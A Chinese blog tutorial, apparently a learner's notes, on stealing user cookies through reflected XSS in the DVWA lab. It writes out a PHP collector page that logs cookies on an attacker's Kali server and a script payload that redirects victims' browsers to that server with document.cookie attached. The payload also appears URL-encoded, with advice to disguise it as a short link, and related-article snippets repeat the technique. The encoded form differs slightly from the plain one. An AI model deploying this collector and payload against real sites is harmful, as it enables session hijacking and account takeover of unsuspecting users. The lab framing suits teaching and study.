使用xss钓鱼盗取用户cookie

最新推荐文章于 2023-10-05 14:39:46 发布
最新推荐文章于 2023-10-05 14:39:46 发布
阅读量855 收藏 1
点赞数 1
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74805513/article/details/131961328
版权

那么流程如下: 

第一步:搭建用于接收cookie的web站点。

(第一部步是要对于kali虚拟机中apache服务有一定的了解和学习的,这样才可以来接收cookie,并且搭建一个web站点)

第二步:构建恶意链接发送给用户。

(这一步 要 尽量的去熟悉xss常用代码比如:

<script>document.lacation='URL/xxs.php?cookie='+document.cookie</script>)将其发送给想要攻击的用户在其带点击 时就可以将其cookie存入准备好的web站点中保存。

第三步:用户点击恶意链接,目标网站返回带有恶意代码的web页面。

第四步:浏览器解析web页面,执行恶意代码,跳转到搭建的web站点。

第五步:从搭建的web站点中获取用户cookie。

需要准备的环境

靶场:DVWA

工具:burpsuite,kali虚拟机

第一步;

搭建我们的web站点,用来接收用户cookie。

这里我用kali来模拟,打开我的kali虚拟机,开启apache服务,进入/var/www/html文件,写一个用来接收cookie的网页,代码如下:

<?php

$a=$_GET["cookie"];

$file=fopen("gtck.html","a") or exit("</br>未找到文件!");

fwrite($file,$a."</br>");

fclose($file);

?>

很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie。

 

这里因为是先学然后在开始做笔记的这样的话以前就创建过这个gtck.html,所以这里就创建gtck2.html来演示一下

之后还有很重要的一件事,我们要给这两个文件改一下权限,不然会导致写入不成功,用户传来的cookie我们无法保存,

首先为我们要查看一下运行apache的用户名,然后更改两个文件的权限。

然后kali对于 文件提权的代码如下:

ps -axu | grep apache #查看运行apache的用户名

chown www-data:www-data xssgc.php gtck.html

 # 更改文件权限

 先获得kali的IP这样便于下一步的操作,

浏览器访问http://192.168.145.135 /xss.php?cookie=5看看传入的值有没有保存在gtck.html里。 

 

 

这边可以看到也是保存到了gtck.html里面

在使用浏览器访问http://192.168.145.135 /xssgc.php?cookie=2,看看传入的值有没有保存在gtck.html里。

那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。

 

可以看到我们写入的1和2都保存到了

那么下面我们就来进行实际操作

第一步

构建恶意连接发送给用户

是用DVWA靶场来进行实验

然后选择反射型xss

 

 

由于我们之前对于xss(reflected)进行了操作所以这里就知道其 存在xxs(reflected)漏洞

那么我们下一步就是构建恶意代码,代码如下:

<script>document.location='http://192.168.145.135 /xssgc.php?cookie='+document.cookie</script>

这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到

我们网页的作用,document.cookie起到获取用户cookie的作用,那么拼接上dvwa的url就是:

localhost/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.145.135 

/xssgc.php?cookie='+document.cookie</script>#

但是url里直接有代码就很明显,而且有时还会出错,所以我们要对payload进行url编码。

打开burp,选择decoder选项,输入我们的payload,选择url编码。

(当然也可以在一些在线编码网站上进行编码)

将编码后的paylod复制下来,然后拼接上url:

localhost/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%31%30%39%2f%78%73%73%67%63%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65a%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

这里就是经过bp编辑过的payload,这个的作用是可

 

以便于隐藏和以及可以更好的去达到获取cookie等用户信息的目的

这就是最后完整的url,我们还可以对其伪造一下,列如短链接啥的,不过只是为了演示这儿就不弄了。

好的,我下 一部步就开始对于这个payload使用DVWA靶场来进行

我们点击生成的恶意代码,来模仿用户点击的得到如下回应

 

 

去kali的gtck.html查看是否有cookie被保存

 

可以看到也是被保存了下来

这样的话也是成功的得到cookie这样就可以,以该用户的名义去登录其账号窃取其机密

可以看到也是被保存了下来

这样的话也是成功的得到cookie这样就可以,以该用户的名义去登录其账号窃取其机密

但是对于将所学的知识用于实践还是有点困难的,因为环境,插件以及新的代代码,都增加了学习的难度

The First Time -- 以念
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2136
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 6971
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 2989
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
xss获取cookie
kiihuang的博客
03-31 813
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS获取cookie
qq_40273198的博客
11-21 4494
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 857
XSS
简单的利用XSS获取用户cookie
shy的博客
10-25 4242
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1213
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
基于dvwa的反射性xss获取其中的cookie分享篇
weixin_47319512的博客
05-10 1225
好切回正题,这段代码的是正则表达意思就是把这些'/
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
最新发布
m0_67844671的博客
10-05 2724
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
第二节 XSS盗取cookie-01
09-15
第二节 XSS盗取cookie-01
第四节 XSS盗取用户信息-01
09-15
第四节 XSS盗取用户信息-01
Web应用安全:XSS盗取cookiepayload.pptx
06-18
XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的...
XSS获取COOKIE
04-20
XSS获取COOKIE
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1727
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
热门推荐
weixin_46709219的博客
01-25 1万+
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。 二)实际
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1428
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
xss盗取cookie原理剖析
weixin_51692662的博客
10-19 1719
xss盗取cookie
xss盗取cookie
07-28
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中插入恶意脚本来获取用户的敏感信息,如cookie。根据引用内容,可以看出这是一个关于XSS攻击的示例代码和描述。 引用\[1\]是一个PHP代码片段,它将通过GET请求获取的cookie信息写入到一个名为cookie.txt的文件中。 引用\[2\]是一个JavaScript代码片段,它将用户cookie信息发送到一个指定的URL,以便攻击者可以收集这些信息。 引用\[3\]描述了一个XSS攻击的实例,其中恶意脚本被插入到URL中,当用户访问该URL时,恶意脚本将被执行,导致用户cookie信息被显示出来。 要防止XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,以确保恶意脚本无法被执行。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。 #### 引用[.reference_title] - *1* *2* [xss盗取cookie原理剖析](https://blog.csdn.net/weixin_51692662/article/details/127407078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络安全实验6 认识XSS & 盗取cookie](https://blog.csdn.net/qq_37672864/article/details/104119221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值